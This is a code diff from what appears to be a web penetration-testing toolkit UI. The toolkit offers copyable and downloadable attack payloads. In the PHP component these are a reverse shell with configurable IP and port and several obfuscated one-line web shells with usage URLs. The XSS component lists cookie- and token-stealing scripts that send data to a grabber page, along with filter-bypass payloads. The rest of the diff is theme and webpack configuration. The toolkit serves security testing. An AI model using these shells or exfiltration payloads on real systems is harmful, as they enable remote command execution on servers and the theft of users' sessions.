style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement('a');
const file = new Blob([ phpReverseShell ], {
type: 'text/plain'
});
element.href = URL.createObjectURL(file);
element.download = 'reverseShell.php';
document.body.appendChild(element);
element.click();
}}
>
<DownloadOutlined />
Download
</Button>
<Clipboard component='a' data-clipboard-text={phpReverseShell}>
<Button
type='dashed'
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
onClick={successInfoReverseShell}
>
<CopyOutlined />
Copy
</Button>
</Clipboard>
</div>
<Divider orientation="left">Basic RCE</Divider>
<div
key='b'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph>
When you have successfully uploaded your payload, just put your commands after the variable ?cmd=
(ex: ?cmd=ls -la")
</Paragraph>
<Paragraph copyable code editable>{oneLiner}</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement('a');
const file = new Blob([ oneLiner ], {
type: 'text/plain'
});
element.href = URL.createObjectURL(file);
element.download = 'basicRCE.php';
document.body.appendChild(element);
element.click();
}}
>
<DownloadOutlined />
Download
</Button>
<Clipboard component='a' data-clipboard-text={oneLiner}>
<Button
type='dashed'
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
onClick={successInfoReverseShell}
>
<CopyOutlined />
Copy
</Button>
</Clipboard>
</div>
<Divider orientation="left">Web Shell</Divider>
<div
key='c'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph>
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands
on a server when pentesting a PHP application.
</Paragraph>
<Collapse defaultActiveKey={[ '0' ]}>
<Panel header='Watch the preview' key='1'>
<img
src='https://i.imgur.com/ALPFDj0.png'
alt='pownyShell'
style={{ height: '100%', width: '100%' }}
/>
</Panel>
</Collapse>
<Button type='primary' style={{ marginBottom: 10, marginTop: 15 }}>
<a
href='https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php'
target='_blank'
rel='noopener noreferrer'
>
<DownloadOutlined /> Download
</a>
</Button>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<a href='https://github.com/flozz/p0wny-shell' target='_blank' rel='noopener noreferrer'>
<ArrowsAltOutlined /> Flozz's repository
</a>
</Button>
</div>
<Divider orientation="left">Obfuscated PHP Web Shell</Divider>
<div
key='d'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{'<?=`$_GET[0]`?>'}</Paragraph>
<Paragraph>{' Usage : http://target.com/path/to/shell.php?0=command '}</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement('a');
const file = new Blob([ '<?=`$_GET[0]`?>' ], {
type: 'text/plain'
});
element.href = URL.createObjectURL(file);
element.download = 'obfuscateShell.php';
document.body.appendChild(element);
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={'<?=`$_GET[0]`?>'}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{'<?=`$_POST[0]`?>'}</Paragraph>
<Paragraph>{' Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command" '}</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement('a');
const file = new Blob([ '<?=`$_POST[0]`?>' ], {
type: 'text/plain'
});
element.href = URL.createObjectURL(file);
element.download = 'obfuscateShell.php';
document.body.appendChild(element);
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={'<?=`$_POST[0]`?>'}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{"<?=`{$_REQUEST['_']}`?>"}</Paragraph>
<Paragraph>Usage :</Paragraph>
<Paragraph>- http://target.com/path/to/shell.php?_=command</Paragraph>
<Paragraph>- curl -X POST http://target.com/path/to/shell.php -d "_=command" '</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement('a');
const file = new Blob([ "<?=`{$_REQUEST['_']}`?>" ], {
type: 'text/plain'
});
element.href = URL.createObjectURL(file);
element.download = 'obfuscateShell.php';
document.body.appendChild(element);
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={"<?=`{$_REQUEST['_']}`?>"}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{shell_obfuscate}</Paragraph>
<Paragraph>Usage :</Paragraph>
<Paragraph>- http://target.com/path/to/shell.php?0=command</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement('a');
const file = new Blob([ shell_obfuscate ], {
type: 'text/plain'
});
element.href = URL.createObjectURL(file);
element.download = 'obfuscateShell.php';
document.body.appendChild(element);
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={shell_obfuscate}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
<div
key='g'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{shell_obfuscate_function}</Paragraph>
<Paragraph>Usage :</Paragraph>
<Paragraph>- http://target.com/path/to/shell.php?_=function&__=argument</Paragraph>
<Paragraph>- http://target.com/path/to/shell.php?_=system&__=ls</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement('a');
const file = new Blob([ shell_obfuscate_function ], {
type: 'text/plain'
});
element.href = URL.createObjectURL(file);
element.download = 'obfuscateShell.php';
document.body.appendChild(element);
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={shell_obfuscate_function}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
</QueueAnim>
);
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
PHP Reverse Shell
</Title>
<Paragraph style={{ margin: 15 }}>
Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to
obtain an interactive shell session on the target machine and continue their attack.
</Paragraph>
<div style={{ padding: 15 }}>
<Row gutter={{ xs: 8, sm: 16, md: 24, lg: 32 }}>
<Col span={12}>
<Input
maxLength={15}
prefix={<WifiOutlined />}
name='Ip adress'
placeholder='IP Address or domain (ex: 212.212.111.222)'
onChange={handleChange( 'ip' )}
value={values.ip}
/>
</Col>
<Col span={12}>
<Input
maxLength={5}
prefix={<IconFont type='icon-Network-Plug' />}
name='Port'
placeholder='Port (ex: 1337)'
onChange={handleChange( 'port' )}
value={values.port}
/>
</Col>
</Row>
</div>
<Divider orientation='center'>Pentestmonkey's reverse shell</Divider>
<div
key='a'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph>This script will make an outbound TCP connection to a hardcoded IP and port.</Paragraph>
<Collapse defaultActiveKey={[ '0' ]}>
<Panel header='View the souce code' key='1'>
<SyntaxHighlighter language='php' style={vs2015} showLineNumbers={true}>
{pretty( phpReverseShell )}
</SyntaxHighlighter>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15 }}>
<a
href='https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php'
target='_blank'
rel='noreferrer noopener'
>
<ArrowsAltOutlined style={{ marginRight: 10 }} />
Pentestmonkey's repository
</a>
</Button>
</Panel>
</Collapse>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement( 'a' );
const file = new Blob( [ phpReverseShell ], {
type: 'text/plain'
} );
element.href = URL.createObjectURL( file );
element.download = 'reverseShell.php';
document.body.appendChild( element );
element.click();
}}
>
<DownloadOutlined />
Download
</Button>
<Clipboard component='a' data-clipboard-text={phpReverseShell}>
<Button
type='dashed'
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
onClick={successInfoReverseShell}
>
<CopyOutlined />
Copy
</Button>
</Clipboard>
</div>
<Divider orientation="center">Basic RCE</Divider>
<div
key='b'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph>
When you have successfully uploaded your payload, just put your commands after the variable ?cmd=
(ex: ?cmd=ls -la")
</Paragraph>
<Paragraph copyable code editable>{oneLiner}</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement( 'a' );
const file = new Blob( [ oneLiner ], {
type: 'text/plain'
} );
element.href = URL.createObjectURL( file );
element.download = 'basicRCE.php';
document.body.appendChild( element );
element.click();
}}
>
<DownloadOutlined />
Download
</Button>
<Clipboard component='a' data-clipboard-text={oneLiner}>
<Button
type='dashed'
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
onClick={successInfoReverseShell}
>
<CopyOutlined />
Copy
</Button>
</Clipboard>
</div>
<Divider orientation="center">Web Shell</Divider>
<div
key='c'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph>
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands
on a server when pentesting a PHP application.
</Paragraph>
<Collapse defaultActiveKey={[ '0' ]}>
<Panel header='Watch the preview' key='1'>
<img
src='https://i.imgur.com/ALPFDj0.png'
alt='pownyShell'
style={{ height: '100%', width: '100%' }}
/>
</Panel>
</Collapse>
<Button type='primary' style={{ marginBottom: 10, marginTop: 15 }}>
<a
href='https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php'
target='_blank'
rel='noopener noreferrer'
>
<DownloadOutlined /> Download
</a>
</Button>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<a href='https://github.com/flozz/p0wny-shell' target='_blank' rel='noopener noreferrer'>
<ArrowsAltOutlined /> Flozz's repository
</a>
</Button>
</div>
<Divider orientation="center">Obfuscated PHP Web Shell</Divider>
<div
key='d'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{'<?=`$_GET[0]`?>'}</Paragraph>
<Paragraph>{' Usage : http://target.com/path/to/shell.php?0=command '}</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement( 'a' );
const file = new Blob( [ '<?=`$_GET[0]`?>' ], {
type: 'text/plain'
} );
element.href = URL.createObjectURL( file );
element.download = 'obfuscateShell.php';
document.body.appendChild( element );
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={'<?=`$_GET[0]`?>'}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
<div
key='e'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{'<?=`$_POST[0]`?>'}</Paragraph>
<Paragraph>{' Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command" '}</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement( 'a' );
const file = new Blob( [ '<?=`$_POST[0]`?>' ], {
type: 'text/plain'
} );
element.href = URL.createObjectURL( file );
element.download = 'obfuscateShell.php';
document.body.appendChild( element );
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={'<?=`$_POST[0]`?>'}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{"<?=`{$_REQUEST['_']}`?>"}</Paragraph>
<Paragraph>Usage :</Paragraph>
<Paragraph>- http://target.com/path/to/shell.php?_=command</Paragraph>
<Paragraph>- curl -X POST http://target.com/path/to/shell.php -d "_=command" '</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement( 'a' );
const file = new Blob( [ "<?=`{$_REQUEST['_']}`?>" ], {
type: 'text/plain'
} );
element.href = URL.createObjectURL( file );
element.download = 'obfuscateShell.php';
document.body.appendChild( element );
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={"<?=`{$_REQUEST['_']}`?>"}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
<div
key='f'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{shell_obfuscate}</Paragraph>
<Paragraph>Usage :</Paragraph>
<Paragraph>- http://target.com/path/to/shell.php?0=command</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement( 'a' );
const file = new Blob( [ shell_obfuscate ], {
type: 'text/plain'
} );
element.href = URL.createObjectURL( file );
element.download = 'obfuscateShell.php';
document.body.appendChild( element );
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={shell_obfuscate}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
<div
key='g'
style={{
padding: 15,
marginTop: 15
}}
>
<Paragraph copyable code editable>{shell_obfuscate_function}</Paragraph>
<Paragraph>Usage :</Paragraph>
<Paragraph>- http://target.com/path/to/shell.php?_=function&__=argument</Paragraph>
<Paragraph>- http://target.com/path/to/shell.php?_=system&__=ls</Paragraph>
<Button
type='primary'
style={{ marginBottom: 10, marginTop: 15 }}
onClick={() => {
const element = document.createElement( 'a' );
const file = new Blob( [ shell_obfuscate_function ], {
type: 'text/plain'
} );
element.href = URL.createObjectURL( file );
element.download = 'obfuscateShell.php';
document.body.appendChild( element );
element.click();
}}
>
<DownloadOutlined /> Download
</Button>
<Clipboard component='a' data-clipboard-text={shell_obfuscate_function}>
<Button type='dashed' style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}>
<CopyOutlined /> Copy
</Button>
</Clipboard>
</div>
</QueueAnim>
);
};

330
src/components/web/XSS.tsx
View File

@@ -3,169 +3,169 @@ import { Typography, Divider } from 'antd';
const { Title, Paragraph } = Typography;
import QueueAnim from 'rc-queue-anim';
export default function XSS() {
const DataGrabber = [
{
title: "<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>"
},
{
title:
"<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>"
},
{
title: "<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>"
},
{
title:
"<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>"
}
];
const BasicXSS = [
{ title: "<script>alert('XSS')</script>" },
{ title: "<scr<script>ipt>alert('XSS')</scr<script>ipt>" },
{ title: '"><script>alert("XSS")</script>' },
{ title: '"><script>alert(String.fromCharCode(88,83,83))</script>' }
];
const ImgPayload = [
{ title: "<img src=x onerror=alert('XSS');>" },
{ title: "<img src=x onerror=alert('XSS')//" },
{ title: '<img src=x onerror=alert(String.fromCharCode(88,83,83));>' },
{
title: '<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>'
},
{ title: '<img src=x:alert(alt) onerror=eval(src) alt=xss>' },
{ title: '"><img src=x onerror=alert("XSS");>' },
{ title: '"><img src=x onerror=alert(String.fromCharCode(88,83,83));>' }
];
const XSSMarkdown = [
{ title: '[a](javascript:prompt(document.cookie))' },
{ title: '[a](j a v a s c r i p t:prompt(document.cookie))' },
{
title: '[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)'
},
{ title: '[a](javascript:window.onerror=alert;throw%201)' }
];
const XSSSvg = [
{
title: "<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>"
},
{ title: '<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>' },
{
title: '<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>'
},
{
title: '<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>'
}
];
const BypassWord = [
{ title: "eval('ale'+'rt(0)');" },
{ title: "Function('ale'+'rt(1)')();" },
{ title: 'new Function`alert`6``;' },
{ title: "setTimeout('ale'+'rt(2)');" },
{ title: "setInterval('ale'+'rt(10)');" },
{ title: "Set.constructor('ale'+'rt(13)')();" },
{ title: 'Set.constructor`al\x65rt\x2814\x29```;' }
];
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
Cross Site Scripting (XSS)
</Title>
<Paragraph style={{ margin: 15 }}>
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into
otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a different end user.
</Paragraph>
<Paragraph style={{ marginLeft: 15 }}>
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses
input from a user within the output it generates without validating or encoding it.
</Paragraph>
<Divider orientation='center'>Data grabber for XSS</Divider>
<div
key='a'
style={{
padding: 15
}}
>
<Paragraph>
Obtains the administrator cookie or sensitive access token, the following payload will send it to a
controlled page.
</Paragraph>
{DataGrabber.map((k, i) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>XSS in HTML/Applications</Divider>
<div
key='b'
style={{
padding: 15
}}
>
{BasicXSS.map((k, i) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
{ImgPayload.map((k, i) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>XSS in Markdown</Divider>
<div
key='c'
style={{
padding: 15
}}
>
{XSSMarkdown.map((k, i) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>XSS in SVG (short)</Divider>
<div
key='d'
style={{
padding: 15
}}
>
{XSSSvg.map((k, i) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
})}
</div>
<Divider orientation='center'>Bypass word blacklist with code evaluation</Divider>
<div
key='e'
style={{
padding: 15
}}
>
{BypassWord.map((k, i) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
})}
</div>
</QueueAnim>
);
export default function XSS () {
const DataGrabber = [
{
title: "<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>"
},
{
title:
"<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>"
},
{
title: "<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>"
},
{
title:
"<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>"
}
];
const BasicXSS = [
{ title: "<script>alert('XSS')</script>" },
{ title: "<scr<script>ipt>alert('XSS')</scr<script>ipt>" },
{ title: '"><script>alert("XSS")</script>' },
{ title: '"><script>alert(String.fromCharCode(88,83,83))</script>' }
];
const ImgPayload = [
{ title: "<img src=x onerror=alert('XSS');>" },
{ title: "<img src=x onerror=alert('XSS')//" },
{ title: '<img src=x onerror=alert(String.fromCharCode(88,83,83));>' },
{
title: '<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>'
},
{ title: '<img src=x:alert(alt) onerror=eval(src) alt=xss>' },
{ title: '"><img src=x onerror=alert("XSS");>' },
{ title: '"><img src=x onerror=alert(String.fromCharCode(88,83,83));>' }
];
const XSSMarkdown = [
{ title: '[a](javascript:prompt(document.cookie))' },
{ title: '[a](j a v a s c r i p t:prompt(document.cookie))' },
{
title: '[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)'
},
{ title: '[a](javascript:window.onerror=alert;throw%201)' }
];
const XSSSvg = [
{
title: "<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>"
},
{ title: '<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>' },
{
title: '<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>'
},
{
title: '<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>'
}
];
const BypassWord = [
{ title: "eval('ale'+'rt(0)');" },
{ title: "Function('ale'+'rt(1)')();" },
{ title: 'new Function`alert`6``;' },
{ title: "setTimeout('ale'+'rt(2)');" },
{ title: "setInterval('ale'+'rt(10)');" },
{ title: "Set.constructor('ale'+'rt(13)')();" },
{ title: 'Set.constructor`al\x65rt\x2814\x29```;' }
];
return (
<QueueAnim delay={300} duration={1500}>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
Cross Site Scripting (XSS)
</Title>
<Paragraph style={{ margin: 15 }}>
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into
otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a different end user.
</Paragraph>
<Paragraph style={{ marginLeft: 15 }}>
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses
input from a user within the output it generates without validating or encoding it.
</Paragraph>
<Divider orientation='center'>Data grabber for XSS</Divider>
<div
key='a'
style={{
padding: 15
}}
>
<Paragraph>
Obtains the administrator cookie or sensitive access token, the following payload will send it to a
controlled page.
</Paragraph>
{DataGrabber.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>XSS in HTML/Applications</Divider>
<div
key='b'
style={{
padding: 15
}}
>
{BasicXSS.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
{ImgPayload.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>XSS in Markdown</Divider>
<div
key='c'
style={{
padding: 15
}}
>
{XSSMarkdown.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>XSS in SVG (short)</Divider>
<div
key='d'
style={{
padding: 15
}}
>
{XSSSvg.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable ellipsis={true}>
{k.title}
</Paragraph>
);
} )}
</div>
<Divider orientation='center'>Bypass word blacklist with code evaluation</Divider>
<div
key='e'
style={{
padding: 15
}}
>
{BypassWord.map( ( k, i ) => {
return (
<Paragraph key={i} copyable code editable>
{k.title}
</Paragraph>
);
} )}
</div>
</QueueAnim>
);
}

7
src/themes/DarkCompactTheme.tsx Normal file
View File

@@ -0,0 +1,7 @@
import styles from './dark-compact.theme.less';
import { useApplyStyles } from '../theming';
export default function DarkTheme () {
useApplyStyles( styles );
return null;
}

8
src/themes/DarkTheme.tsx Normal file
View File

@@ -0,0 +1,8 @@
import * as React from 'react';
import styles from './dark-compact.theme.less';
import { useApplyStyles } from '../theming';
export default function DarkTheme () {
useApplyStyles( styles );
return null;
}

8
src/themes/LightCompactTheme.tsx Normal file
View File

@@ -0,0 +1,8 @@
import * as React from 'react';
import styles from './light-compact.theme.less';
import { useApplyStyles } from '../theming';
export default function LightCompactTheme () {
useApplyStyles( styles );
return null;
}

8
src/themes/LightTheme.tsx Normal file
View File

@@ -0,0 +1,8 @@
import * as React from 'react';
import styles from './light.theme.less';
import { useApplyStyles } from '../theming';
export default function DarkTheme () {
useApplyStyles( styles );
return null;
}

6
src/themes/dark-compact.theme.less Normal file
View File

@@ -0,0 +1,6 @@
@import '../../node_modules/antd/dist/antd.dark.less';
@import '../../node_modules/antd/dist/antd.compact.less';
.site-layout .site-layout-background {
background: #0f0f0f;
border-radius: 10px;
}

5
src/themes/dark.theme.less Normal file
View File

@@ -0,0 +1,5 @@
@import '../../node_modules/antd/dist/antd.dark.less';
.site-layout .site-layout-background {
background: #0f0f0f;
border-radius: 10px;
}

29
src/themes/index.ts Normal file
View File

@@ -0,0 +1,29 @@
import { lazy } from 'react';
import { Theme } from '../theming/types';
export const themes: Theme[] = [
{
id: 'light', // used as value in the select
displayName: 'Light', // used as label in the select
filename: 'light.theme.less',
component: lazy(() => import('../themes/LightTheme'))
},
{
id: 'lightCompact',
displayName: 'Light Compact',
filename: 'light.theme.less',
component: lazy(() => import('../themes/LightCompactTheme'))
},
{
id: 'dark',
displayName: 'Dark',
filename: 'light.theme.less',
component: lazy(() => import('../themes/DarkTheme'))
},
{
id: 'darkCompact',
displayName: 'Dark Compact',
filename: 'light.theme.less',
component: lazy(() => import('../themes/DarkCompactTheme'))
}
];

9
src/themes/light-compact.theme.less Normal file
View File

@@ -0,0 +1,9 @@
@import '../../node_modules/antd/dist/antd.compact.less';
.site-layout .site-layout-background {
background: #fff;
border-radius: 10px;
}
.ant-divider-dashed {
border-color: rgba(0, 0, 0, 0.20);
}

9
src/themes/light.theme.less Normal file
View File

@@ -0,0 +1,9 @@
@import '../../node_modules/antd/dist/antd.less';
.site-layout .site-layout-background {
background: #fff;
border-radius: 10px;
}
.ant-divider-dashed {
border-color: rgba(0, 0, 0, 0.20);
}

18
src/theming/LoadingIndicator.tsx Normal file
View File

@@ -0,0 +1,18 @@
import * as React from 'react';
import { Spin, SpinProps } from 'antd';
import { LoadingOutlined } from '@ant-design/icons';
export default function LoadingIndicator ( props: SpinProps ) {
return (
<div
style={{
height: '100%',
position: 'absolute',
top: '50%',
left: '50%',
transform: 'translate(-50%, -520%)'
}}>
<Spin indicator={<LoadingOutlined />} {...props} />
</div>
);
}

26
src/theming/index.tsx Normal file
View File

@@ -0,0 +1,26 @@
import * as React from 'react';
import { Suspense, useEffect } from 'react';
import { LazyStyle, Theme } from './types';
import LoadingIndicator from './LoadingIndicator';
export function useApplyStyles ( styles: LazyStyle ): void {
useEffect( () => {
styles.use();
return () => styles.unuse();
} );
}
interface DynamicThemeProps {
themes: Theme[],
value: string,
}
export default function DynamicTheme ( { themes, value }: DynamicThemeProps ) {
const Component = themes.find( theme => theme.id === value )?.component;
return (
<Suspense fallback={<LoadingIndicator tip="loading" />}>
<Component />
</Suspense>
);
}

13
src/theming/types.ts Normal file
View File

@@ -0,0 +1,13 @@
import { ReactNode } from 'react';
export interface LazyStyle {
use: () => void;
unuse: () => void;
}
export interface Theme {
id: string;
displayName: string;
filename: string;
component: ReactNode;
}

16
tsconfig.json
View File

@@ -2,13 +2,27 @@
"compilerOptions": {
"jsx": "react",
"module": "commonjs",
"allowSyntheticDefaultImports": true,
"noImplicitAny": false,
"outDir": "./dist/",
"preserveConstEnums": true,
"removeComments": true,
"esModuleInterop": true,
"baseUrl": "src",
"sourceMap": true,
"target": "es5",
"moduleResolution": "node",
"target": "es6",
"paths": {
"compforms": [
"compforms"
],
"components": [
"components"
],
"utils": [
"utils"
]
}
},
"include": [
"./src/**/**/*"

31
webpack.config.js
View File

@@ -3,6 +3,16 @@ const path = require('path');
const HtmlWebpackPlugin = require('html-webpack-plugin');
const { CleanWebpackPlugin } = require('clean-webpack-plugin');
const CopyWebpackPlugin = require('copy-webpack-plugin');
const ReactRefreshWebpackPlugin = require('@pmmmwh/react-refresh-webpack-plugin');
const lessLoader = {
loader: 'less-loader',
options: {
lessOptions: {
javascriptEnabled: true
}
}
};
module.exports = {
mode: 'development',
@@ -14,6 +24,7 @@ module.exports = {
plugins: [
new webpack.HotModuleReplacementPlugin(),
new CleanWebpackPlugin(),
new ReactRefreshWebpackPlugin(),
new HtmlWebpackPlugin({
title: 'Output Management',
template: './src/index.html'
@@ -70,11 +81,11 @@ module.exports = {
loader: 'ts-loader',
exclude: /node_modules/
},
{
/* {
test: /\.css$/,
include: path.resolve(__dirname, 'src'),
use: [ 'style-loader', 'css-loader' ]
},
}, */
{
test: /\.(png|svg|jpg|gif)$/,
include: path.resolve(__dirname, 'src'),
@@ -84,6 +95,22 @@ module.exports = {
test: /\.(woff|woff2|eot|ttf|otf)$/,
include: path.resolve(__dirname, 'src'),
use: [ 'file-loader' ]
},
{
test: /\.theme\.(less|css)$/i,
use: [
{
loader: 'style-loader',
options: { injectType: 'lazyStyleTag' }
},
'css-loader',
lessLoader
]
},
{
test: /\.(less|css)$/,
exclude: /\.theme\.(less|css)$/i,
use: [ 'style-loader', 'css-loader' ]
}
]
}